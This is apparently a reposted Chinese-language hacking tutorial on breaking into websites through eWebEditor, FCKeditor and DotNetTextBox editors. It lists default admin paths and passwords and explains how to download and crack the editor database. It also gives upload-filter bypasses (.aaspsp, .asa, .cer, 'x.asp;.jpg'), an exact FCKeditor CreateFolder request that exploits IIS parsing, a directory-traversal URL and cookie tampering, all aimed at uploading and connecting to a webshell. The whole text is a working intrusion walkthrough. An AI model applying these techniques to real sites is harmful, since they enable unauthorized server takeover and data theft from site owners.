1.常見的編輯器

常見的有Ewebeditor,fckeditor,ckeditor,kindeditor等等。這里有份編輯器漏洞手冊:

2.Ewebeditor編輯器

Ewebeditor是基于瀏覽器的、所見即所得的在線HTML編輯器。她能夠在網頁上實現許多桌面編輯軟件(如：Word)所具有的強大可視編輯功能。WEB開發人員可以用她把傳統的多行文本輸入框替換為可視化的富文本輸入框，使最終用戶可以可視化的發布HTML格式的網頁內容。eWebEditor!已基本成為網站內容管理發布的必備工具！

3.Ewebeditor利用核心

如何發現編輯器地址

Ewebeditor：

默認后臺：ewebeditor/admin_login.asp

默認數據庫：ewebeditor/db/ewebeditor.mdb

默認賬號密碼：admin admin/admin888

4.利用過程

通常入侵ewebeditor編輯器的步驟如下:

1、首先訪問默認管理頁看是否存在

默認管理頁地址2.80以前為?ewebeditor/admin_login.asp?以后版本為admin/login.asp(其他語言改后戳,這里以asp為例)

。

2、默認管理帳號密碼

默認管理頁存在！我們就用帳號密碼登陸！默認帳號密碼為: admin admin888?！常用的密碼還有admin

admin999 admin1 admin000?之類的。

3、默認數據庫地址

如果密碼不是默認的。我們訪問的就不是默認數據庫！嘗試下載數據庫得到管理員密碼！管理員的帳號密碼，都在eWebEditor_System表段里，sys_UserName

Sys_UserPass?都是md5加密的。得到了加密密碼。可以去www.cmd5.com www.xmd5.org?等網站進行查詢！暴力這活好久不干了！也可以丟國外一些可以跑密碼的網站去跑!

默認數據庫路徑為:ewebeditor/db/ewebeditor.mdb?常用數據庫路徑為:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb?等等。

很多管理員常改.asp后綴，一般訪問.asp

.asa?后綴的都是亂碼！可以用下載工具下載下來，然后更改后綴為.mdb來查看內容！

4、漏洞基本利用步驟，以asp為例！

1)? 登陸后臺以后。選擇樣式管理，默認編輯器的默認樣式都不可以修改的。我們可以從任意樣式新建一個樣式，然后在圖片上傳添加可上傳后綴。.asa .cer .cdx 等！.asp 過濾過了。但是我們可以用.aaspsp后綴來添加，這樣上傳文件正好被ewebeditor 吃掉asp后綴，剩下.asp 。同樣，如果遇到一個管理員有安全意識的，從代碼里，把.asp .asa .cer .cdx 都完全禁止了，我們也可以用.asasaa

后綴來突破。添加完了后綴，可以在樣式管理，點擊預覽，然后上傳！

asa|cer|asp|aaspsp

Asa cer 它可以在iis6.0平臺解析為asp執行

Aaspsp：繞過過濾 過濾asp aaspsp=》asp

注意：低版本ewebeditor不支持ie7.0以下版本訪問(ietest軟件模擬ie6.0上傳)

以下以2.1.6這個版本為例來演示:

點擊樣式管理,然后新增樣式

在圖片類型中加入以下類型:asa|cer|asp|aaspsp

然后點擊提交。

然后在工具欄里新增工具

在按鈕設置里新增"插入或修改圖片"

然后點擊保存設置。然后再回去點擊預覽。

控件效果就出來了。然后直接上傳一句話木馬

點擊確定，上傳成功，之后，查看代碼，就能看到完整的地址

用菜刀一連就能就OK了。。。

2)目錄遍歷

點擊"上傳文件管理" 然后選擇樣式目錄。

在id=14后面加上&dir=../

http://192.168.87.129:8123/admin_uploadfile.asp?id=14&dir=../

發現沒有起作用，那就是2.1.6這個版本不存在這個漏洞。換成2.8.0。2.8.0存在這個漏洞

能遍歷目錄。

3)尋找前人痕跡再次入侵

有時候用戶名與密碼得等不進去，但是數據庫可以下載，這時候就可以看下是否有前人入侵過，如果有人入侵過的話，就可以利用下面的方法進入突破。

如何判斷有前人入侵過了??下載好數據庫之后查看他的eWebEditor_style表中的S_ImageExt字段是否有被人添加過什么。

使用下面的語句進入突破:

ewebeditor.asp?ID=xx&style=yy

其中的id=xx就是被修改過的那條記錄的id，而yy就是S_name字段的名字。

例如這里就修改成: ewebeditor.asp?ID=54&style=testckse 去訪問

圖片控件就出來了。。

5.FCKeditor編輯器

1.查看編輯器版本

FCKeditor/_whatsnew.html

2.FCKeditor編輯器頁

FCKeditor/_samples/default.html

3.常用上傳地址

1. FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

2. FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/3. FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

4. FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

由于這里用的是2.5的版本所以下面這條語句能用

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

如果在輸入以上地址測試的過程中彈出以下的提示

那就是沒有開啟文件上傳功能,要把\editor\filemanager\connectors\asp\config.asp文件中的

Dim ConfigIsEnabled

ConfigIsEnabled = False

設置成功true。就行了，然后上傳6.asp;.jpg文件試試

發現他進行了過濾6.asp;.jpg改成了6_asp;.jpg,把點改成了下劃線。審查元素看下圖片的路徑

訪問這個路徑看下。

asp文件并沒有被解析成功。

這就是fckeditor過濾"."為"_"的一個機制,想要突破的話有以下兩種方式：

1.二次上傳

第一次上傳：qq.asp;.jpg ==》qq_asp;.jpg

第二次上傳：qq.asp;.jpg ==》qq_asp;.jpg (不滿足命名要求)

可能出現第二次命名為qq.asp;.(1).jpg

還是被過濾了。。

2.新建上傳

手動新建一個文件夾

發現他還是過濾了。那我們只有突破建立文件夾了。

執行以下地址就能成功創建文件夾

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp

這又是為什么了????手動不能創建，而通過以上地址就能成功創建了，讓我們來對比下，手動創建和通過以上地址創建的一個區別。

漏洞地址：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp

手工新建：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因：

CurrentFolder：當前文件夾未進行過濾(這個文件夾下的沒有過濾)

NewFolderName：新建文件名進行了過濾

這就是為什么通過上面地址能創建，而手動卻不能創建的一個原因，然后我們再上傳6.asp;.jpg到fendo.asp文件下看是否成功解析。

成功解析。。

3.DotNetTextBox編輯器漏洞利用

DotNetTextBox編輯器洞洞文件上傳漏洞

詳細說明：

漏洞證明：

1、用firebug將disabled="disabled'，value="jgp,gif,png"修改為enabled="enabled",value="jpg,gif,png,aspx"，然后點更新成功按鈕

2、彈出更新成功

3、刷新頁面，發現此時可允許上傳的圖片類型，成功新增aspx類型

4、找個aspx webshell上傳、提示文件上傳成功

5、上傳成功、成功躺在那里

6、webshell頁面

但是有 system_dntb/uploadimg.aspx 并能打開，這時候是不能上傳的，由于他是驗證cookie來得出上傳后的路徑，這樣我們可以用cookie欺騙工具。或者用burpsuite抓包修改cookie，修改為：

cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/

路徑可以修改，只是權限夠，上傳后改名為1.asp;.jpg利用iis解析漏洞。

總結

以上是生活随笔為你收集整理的ue编辑器漏洞_7. 编辑器漏洞整理的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。